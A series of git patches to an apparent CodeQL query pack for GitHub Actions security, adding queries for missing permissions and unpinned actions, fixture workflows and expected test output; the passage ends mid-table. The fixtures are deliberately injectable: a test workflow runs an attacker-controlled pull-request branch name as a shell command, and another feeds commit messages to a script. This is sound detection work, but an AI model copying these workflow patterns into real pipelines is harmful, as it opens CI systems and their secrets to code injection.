run: | + gh issue edit ${{ github.event.issue.number }} --add-label "NotMLEvaluated" --repo ${{ github.repository }} diff --git a/ql/src/test/.github/workflows/cross3.yml b/ql/src/test/.github/workflows/cross3.yml new file mode 100644 index 00000000000..21ee9ca7f61 --- /dev/null +++ b/ql/src/test/.github/workflows/cross3.yml @@ -0,0 +1,67 @@ +# cherry-picking.yaml (https://github.com/Bughalla/dynamods_dynamo/blob/1c1d3e29ee9bca81b43d78f22bf953100ef67009/.github/workflows/disabled/cherry-picking.yaml#L45-L51) +#DYN-3364 +#This action is disabled for now due to it not behaving as expected +name: Cherry picking +on: + push: + branches: + - master +jobs: + cherry_pick: + runs-on: ubuntu-latest + env: + #Variable for the name of the branch to cherry-pick into. + #It will remain 'invalid' if no branch is specified + destination_branch: 'invalid' + #Name of the autogenerated branch to create the PR from + auto_branch: 'auto-${{github.event.after}}' + #Username for the cherrypick + user_name: "Dynamo-Bot" + steps: + - name: checkout + uses: actions/checkout@v3 + + #Removes posible conflicting characters on the commit message + #This is because the content of the message will be passed to a script as a parameter and quotation marks will split the text as if it where multiple parameters. + - name: Remove conflicting chars + uses: frabert/replace-string-action@v1.2 + id: remove_quotations + with: + pattern: "\"" + string: ${{github.event.commits[0].message}} + replace-with: "-" + flags: g + + #Checks the message looking for a cherry-pick request and extracts the target branch name + - name: Check Information + env: + ISSUE_BODY_PARSED: ${{steps.remove_quotations.outputs.replaced}} + id: check-info + run: | + echo "destination_branch=$(pwsh .\\.github\\scripts\\cherry_pick_check.ps1 "${{ env.ISSUE_BODY_PARSED }}" )" >> $GITHUB_ENV + + #If a target branch was found will run the action + - if: env.destination_branch != 'invalid' + name: Create PR to branch + run: | + git config user.name "${{env.user_name}}" + git fetch --all + git checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}} + git cherry-pick -x ${{github.event.after}} --strategy-option theirs + git push -u origin ${{env.auto_branch}} + hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}" + env: + #Token used for the pull request. Corresponds to the DynamoBot account + GITHUB_TOKEN: ${{secrets.DYNAMOBOTTOKEN}} + ISSUE_BODY_PARSED: ${{steps.remove_quotations.outputs.replaced}} + #This represents the title and description of the pr in Markdown format + #Everything before the first blank line will be the title + #Everything after will be included in the description + pr_message: | + Cherry-Pick from commit: ${{github.event.after}} + + ### Cherry-picking: + [Commit](https://github.com/DynamoDS/Dynamo/commit/${{github.event.after}}) + + ### Pull request: + ${{ env.ISSUE_BODY_PARSED }} From fe976faf6ace6067fb39368a0bdedb92473a3e0e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 27 Feb 2024 15:20:35 +0100 Subject: [PATCH 0075/1267] feat(queries): Migrate queries from AdvancedSecurity repo --- ql/lib/codeql/actions/Ast.qll | 10 +++-- .../dataflow/internal/DataFlowPrivate.qll | 4 +- ql/src/Security/CWE-094/UntrustedCheckout.md | 0 ql/src/Security/CWE-094/UntrustedCheckout.ql | 1 + .../CWE-275/MissingActionsPermissions.md | 22 ++++++++++ .../CWE-275/MissingActionsPermissions.ql | 23 ++++++++++ ql/src/Security/CWE-829/UnpinnedActionsTag.md | 44 +++++++++++++++++++ ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 38 ++++++++++++++++ ql/src/test/.github/workflows/cross1.yml | 1 + ql/src/test/.github/workflows/cross2.yml | 1 + ql/src/test/.github/workflows/cross3.yml | 1 + 11 files changed, 139 insertions(+), 6 deletions(-) create mode 100644 ql/src/Security/CWE-094/UntrustedCheckout.md create mode 100644 ql/src/Security/CWE-275/MissingActionsPermissions.md create mode 100644 ql/src/Security/CWE-275/MissingActionsPermissions.ql create mode 100644 ql/src/Security/CWE-829/UnpinnedActionsTag.md create mode 100644 ql/src/Security/CWE-829/UnpinnedActionsTag.ql diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index fd66acf530d..2a506f2100c 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -54,8 +54,6 @@ class CompositeActionStmt extends Statement instanceof Actions::CompositeAction InputsStmt getInputsStmt() { result = this.(YamlMapping).lookup("inputs") } OutputsStmt getOutputsStmt() { result = this.(YamlMapping).lookup("outputs") } - - string getName() { result = this.getLocation().getFile().getRelativePath() } } class RunsStmt extends Statement instanceof Actions::Runs { @@ -68,6 +66,8 @@ class RunsStmt extends Statement instanceof Actions::Runs { * A Github Actions Workflow */ class WorkflowStmt extends Statement instanceof Actions::Workflow { + string getName() { result = super.getName() } + JobStmt getAJobStmt() { result = super.getJob(_) } JobStmt getJobStmt(string id) { result = super.getJob(id) } @@ -79,6 +79,8 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { string getATriggerEvent() { exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(result)) } + + Statement getPermissionsStmt() { result = this.(YamlMapping).lookup("permissions") } } class ReusableWorkflowStmt extends WorkflowStmt { @@ -91,8 +93,6 @@ class ReusableWorkflowStmt extends WorkflowStmt { InputsStmt getInputsStmt() { result = workflow_call.(YamlMapping).lookup("inputs") } OutputsStmt getOutputsStmt() { result = workflow_call.(YamlMapping).lookup("outputs") } - - string getName() { result = this.getLocation().getFile().getRelativePath() } } class InputsStmt extends Statement instanceof YamlMapping { @@ -189,6 +189,8 @@ class JobStmt extends Statement instanceof Actions::Job { } IfStmt getIfStmt() { result = super.getIf() } + + Statement getPermissionsStmt() { result = this.(YamlMapping).lookup("permissions") } } /** diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index de88c39c2d5..43239e29485 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -83,10 +83,10 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof ReusableWorkflowStmt - then result = this.(ReusableWorkflowStmt).getName() + then result = this.(ReusableWorkflowStmt).getLocation().getFile().getRelativePath() else if this instanceof CompositeActionStmt - then result = this.(CompositeActionStmt).getName() + then result = this.(CompositeActionStmt).getLocation().getFile().getRelativePath() else none() } } diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.md b/ql/src/Security/CWE-094/UntrustedCheckout.md new file mode 100644 index 00000000000..e69de29bb2d diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.ql b/ql/src/Security/CWE-094/UntrustedCheckout.ql index 9c9b5f9eb26..bb6c0d9a029 100644 --- a/ql/src/Security/CWE-094/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-094/UntrustedCheckout.ql @@ -6,6 +6,7 @@ * @kind problem * @problem.severity warning * @precision low + * @security-severity 9.3 * @id actions/untrusted-checkout * @tags actions * security diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.md b/ql/src/Security/CWE-275/MissingActionsPermissions.md new file mode 100644 index 00000000000..5c0e433c5cb --- /dev/null +++ b/ql/src/Security/CWE-275/MissingActionsPermissions.md @@ -0,0 +1,22 @@ +# Actions Job and Workflow Permissions are not set + +A GitHub Actions job or workflow hasn't set permissions to restrict privileges to the workflow job. +A workflow job by default without the `permissions` key or a root workflow `permissions` will run with all the permissions which can be given to a workflow. + +## Recommendation + +Add the `permissions` key to the job or workflow (applied to all jobs) and set the permissions to the least privilege required to complete the task: + +```yaml +name: "My workflow" +permissions: + contents: read + pull-requests: write + +# or +jobs: + my-job: + permissions: + contents: read + pull-requests: write +``` diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.ql b/ql/src/Security/CWE-275/MissingActionsPermissions.ql new file mode 100644 index 00000000000..a4cecf18b78 --- /dev/null +++ b/ql/src/Security/CWE-275/MissingActionsPermissions.ql @@ -0,0 +1,23 @@ +/** + * @name Workflow does not contain permissions + * @description Workflows should contain permissions to provide a clear understanding has permissions to run the workflow. + * @kind problem + * @security-severity 5.0 + * @problem.severity warning + * @precision high + * @id actions/missing-workflow-permissions + * @tags actions + * maintainability + * external/cwe/cwe-275 + */ + +import actions + +from WorkflowStmt workflow, JobStmt job +where + job = workflow.getAJobStmt() and + ( + not exists(workflow.getPermissionsStmt()) and + not exists(job.getPermissionsStmt()) + ) +select job, "Actions Job or Workflow does not set permissions" diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.md b/ql/src/Security/CWE-829/UnpinnedActionsTag.md new file mode 100644 index 00000000000..855773e6a31 --- /dev/null +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.md @@ -0,0 +1,44 @@ +# Unpinned tag for 3rd party Action in workflow + +The individual jobs in a GitHub Actions workflow can interact with (and compromise) other jobs. For example, a job querying the environment variables used by a later job, writing files to a shared directory that a later job processes, or even more directly by interacting with the Docker socket and inspecting other running containers and executing commands in them. This means that a compromise of a single action within a workflow can be very significant, as that compromised action would have access to all secrets configured on your repository, and may be able to use the `GITHUB_TOKEN` to write to the repository. Consequently, there is significant risk in sourcing actions from third-party repositories on GitHub. For information on some of the steps an attacker could take, see "Security hardening for GitHub Actions." + +## Recommendation + +Pin an action to a full length commit SHA. This is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork. + +## Example + +In this example, the Actions workflow uses an unpinned version. + +```yaml +name: "Unpinned Action Example" + +jobs: + build: + steps: + - name: Checkout repository + uses: actions-third-party-mirror/checkout@v3 + + - run: | + ./build.sh +``` + +The Action is pinned in the example below. + +```yaml +name: "Pinned Action Example" + +jobs: + build: + steps: + - name: Checkout repository + uses: actions-mirror-third-party/checkout@ac593985615ec2ede58e132d2e21d2b1cbd6127c + + - run: | + ./build.sh +``` + +## References + +- GitHub: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions) +- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html). diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql new file mode 100644 index 00000000000..12bc06481be --- /dev/null +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -0,0 +1,38 @@ +/** + * @name Unpinned tag for 3rd party Action in workflow + * @description Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. + * @kind problem + * @security-severity 5.0 + * @problem.severity warning + * @precision high + * @id actions/unpinned-tag + * @tags security + * actions + * external/cwe/cwe-829 + */ + +import actions + +bindingset[version] +private predicate isPinnedCommit(string version) { version.regexpMatch("^[A-Fa-f0-9]{40}$") } + +bindingset[repo] +private predicate isTrustedOrg(string repo) { + exists(string org | org in ["actions", "github", "advanced-security"] | repo.matches(org + "/%")) +} + +from StepUsesExpr uses, string repo, string version, WorkflowStmt workflow, string name +where + uses.getCallee() = repo and + uses.getVersion() = version and + uses.getEnclosingWorkflowStmt() = workflow and + ( + workflow.getName() = name + or + not exists(workflow.getName()) and workflow.getLocation().getFile().getBaseName() = name + ) and + not isPinnedCommit(version) and + not isTrustedOrg(repo) +select uses, + "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version + + "', not a pinned commit hash", uses, uses.toString() diff --git a/ql/src/test/.github/workflows/cross1.yml b/ql/src/test/.github/workflows/cross1.yml index 9927aca8c56..946497250e6 100644 --- a/ql/src/test/.github/workflows/cross1.yml +++ b/ql/src/test/.github/workflows/cross1.yml @@ -3,6 +3,7 @@ name: Issue Workflow on: issues: types: [opened,edited] +permissions: {} jobs: #This job will check the issue to determine if it should be moved to a different repository redirectIssue: diff --git a/ql/src/test/.github/workflows/cross2.yml b/ql/src/test/.github/workflows/cross2.yml index ae24e21560b..ef8269151d7 100644 --- a/ql/src/test/.github/workflows/cross2.yml +++ b/ql/src/test/.github/workflows/cross2.yml @@ -2,6 +2,7 @@ name: Issue Type Predicter # This workflow uses https://github.com/DynamoDS/IssuesTypePredicter to predict the type of a github issue +permissions: {} on: issues: types: [opened, edited] diff --git a/ql/src/test/.github/workflows/cross3.yml b/ql/src/test/.github/workflows/cross3.yml index 21ee9ca7f61..ddb98c670c7 100644 --- a/ql/src/test/.github/workflows/cross3.yml +++ b/ql/src/test/.github/workflows/cross3.yml @@ -6,6 +6,7 @@ on: push: branches: - master +permissions: {} jobs: cherry_pick: runs-on: ubuntu-latest From 8e7e5d03a5b4ae096c9f6ad5a8c52684fc214681 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 28 Feb 2024 11:15:38 +0100 Subject: [PATCH 0076/1267] fix(test): Add expected files --- build-dbs.sh | 5 - ql/lib/test/test.expected | 378 +++++++++++++++++++++++++++++++++++ ql/src/test/partial.expected | 28 +++ ql/src/test/test.expected | 152 ++++++++++++++ 4 files changed, 558 insertions(+), 5 deletions(-) delete mode 100755 build-dbs.sh create mode 100644 ql/lib/test/test.expected create mode 100644 ql/src/test/partial.expected create mode 100644 ql/src/test/test.expected diff --git a/build-dbs.sh b/build-dbs.sh deleted file mode 100755 index 073fcc40b44..00000000000 --- a/build-dbs.sh +++ /dev/null @@ -1,5 +0,0 @@ -#!/bin/bash -rm -rf ql/src/test/test.testproj || true -rm -rf ql/lib/test/test.testproj || true -codeql database create ql/src/test/test.testproj -l yaml -s ql/src/test -codeql database create ql/lib/test/test.testproj -l yaml -s ql/lib/test diff --git a/ql/lib/test/test.expected b/ql/lib/test/test.expected new file mode 100644 index 00000000000..4007e6454ea --- /dev/null +++ b/ql/lib/test/test.expected @@ -0,0 +1,378 @@ +files +| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | +yamlNodes +| .github/workflows/test.yml:1:1:1:2 | on | +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:3:1:3:4 | jobs | +| .github/workflows/test.yml:4:3:4:6 | job1 | +| .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:5:5:5:11 | runs-on | +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | +| .github/workflows/test.yml:7:5:7:11 | outputs | +| .github/workflows/test.yml:8:7:8:16 | job_output | +| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:10:5:10:9 | steps | +| .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:11:9:11:12 | uses | +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | +| .github/workflows/test.yml:12:9:12:12 | with | +| .github/workflows/test.yml:13:11:13:21 | fetch-depth | +| .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | +| .github/workflows/test.yml:13:24:13:24 | 0 | +| .github/workflows/test.yml:15:9:15:12 | name | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | +| .github/workflows/test.yml:16:9:16:10 | id | +| .github/workflows/test.yml:16:13:16:18 | source | +| .github/workflows/test.yml:17:9:17:12 | uses | +| .github/workflows/test.yml:17:15:17:42 | tj-acti ... les@v40 | +| .github/workflows/test.yml:19:9:19:12 | name | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:19:15:19:43 | Remove ... d files | +| .github/workflows/test.yml:20:9:20:10 | id | +| .github/workflows/test.yml:20:13:20:16 | step | +| .github/workflows/test.yml:21:9:21:12 | uses | +| .github/workflows/test.yml:21:15:21:55 | mad9000 ... tring@3 | +| .github/workflows/test.yml:22:9:22:12 | with | +| .github/workflows/test.yml:23:11:23:16 | source | +| .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:24:11:24:14 | find | +| .github/workflows/test.yml:24:17:24:21 | "foo" | +| .github/workflows/test.yml:25:11:25:17 | replace | +| .github/workflows/test.yml:25:20:25:21 | "" | +| .github/workflows/test.yml:26:9:26:10 | id | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:27:9:27:11 | run | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:28:10 | id | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| .github/workflows/test.yml:29:9:29:11 | run | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:31:3:31:6 | job2 | +| .github/workflows/test.yml:32:5:32:11 | runs-on | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | +| .github/workflows/test.yml:34:5:34:6 | if | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:36:5:36:9 | needs | +| .github/workflows/test.yml:36:12:36:15 | job1 | +| .github/workflows/test.yml:38:5:38:9 | steps | +| .github/workflows/test.yml:39:7:40:53 | - id: sink | +| .github/workflows/test.yml:39:9:39:10 | id | +| .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:39:13:39:16 | sink | +| .github/workflows/test.yml:40:9:40:11 | run | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +jobNodes +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +stepNodes +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:39:9:40:53 | id: sink | +allUsesNodes +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +stepUsesNodes +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +jobUsesNodes +usesSteps +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | fetch-depth | .github/workflows/test.yml:13:24:13:24 | 0 | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | find | .github/workflows/test.yml:24:17:24:21 | "foo" | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | replace | .github/workflows/test.yml:25:20:25:21 | "" | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | source | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +runSteps1 +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | id: sink | echo ${{needs.job1.outputs.job_output}} | +runSteps2 +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +runStepChildren +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:9:26:10 | id | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:27:9:27:11 | run | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:28:9:28:10 | id | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:29:9:29:11 | run | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:9:39:10 | id | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:13:39:16 | sink | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:9:40:11 | run | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +varAccesses +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | steps.step.outputs.value | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | github.event.pull_request.head.ref | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | always() | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | needs.job1.outputs.job_output | +orphanVarAccesses +nonOrphanVarAccesses +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | steps.step.outputs.value | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | steps.source.outputs.all_changed_files | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | github.event.pull_request.head.ref | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | always() | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | needs.job1.outputs.job_output | .github/workflows/test.yml:39:9:40:53 | id: sink | +parentNodes +| .github/workflows/test.yml:1:1:1:2 | on | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:3:1:3:4 | jobs | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:4:3:4:6 | job1 | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:4:3:40:53 | job1: | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:5:11 | runs-on | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:7:5:7:11 | outputs | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:8:7:8:16 | job_output | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:10:5:10:9 | steps | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:11:9:11:12 | uses | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:12:9:12:12 | with | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:13:11:13:21 | fetch-depth | .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | +| .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | +| .github/workflows/test.yml:15:9:15:12 | name | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:16:9:16:10 | id | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:17:9:17:12 | uses | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:17:15:17:42 | tj-acti ... les@v40 | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:19:12 | name | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:19:15:19:43 | Remove ... d files | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:20:9:20:10 | id | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:21:9:21:12 | uses | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:21:15:21:55 | mad9000 ... tring@3 | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:22:9:22:12 | with | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:23:11:23:16 | source | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:24:11:24:14 | find | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:24:17:24:21 | "foo" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:25:11:25:17 | replace | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:25:20:25:21 | "" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:26:9:26:10 | id | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:27:9:27:11 | run | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:28:9:28:10 | id | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:29:9:29:11 | run | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:31:3:31:6 | job2 | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:32:5:32:11 | runs-on | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:34:5:34:6 | if | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | 